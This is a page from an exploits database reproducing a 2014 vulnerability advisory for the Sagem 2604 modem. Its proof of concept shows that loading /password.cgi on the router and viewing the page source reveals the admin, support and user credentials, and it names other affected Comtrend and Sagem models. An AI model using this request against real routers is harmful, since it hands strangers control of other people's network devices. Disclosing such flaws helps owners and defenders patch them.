[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Sagem 2604 Password Disclosure Vulnerability

Author
TUNISIAN CYBER
Risk
[
Security Risk High
]
0day-ID
0day-ID-22325
Category
web applications
Date add
07-06-2014
Platform
hardware
[+]Title: Sagem 2604 Password Discolusre vulnerability
[+]Author: TUNISIAN CYBER
[+]Date: 6/JUN/2014
[+]Type:WebApp
[+]Risk:High
[+]Affected Version: v2604
                     Hardware Version:  253251193
                     Software Version:  3.21a4G


[+]Overview:
Sagem modem suffers, from a password discolsure vulnerability.

[+]Proof Of Concept:
myrouter/(or)192.168.1.1/password.cgi
View Source
pwdAdmin = 'password';
pwdSupport = 'password';
pwdUser = 'password';

nmAdmin = 'username';
nmSupport = 'username';
nmUser = 'username';

http://i.imgur.com/2g55TRn.png

Other modems which suffers from this vuln.:
Comtrend CT 53XX
Sagem 2404

#  0day.today [2024-12-24]  #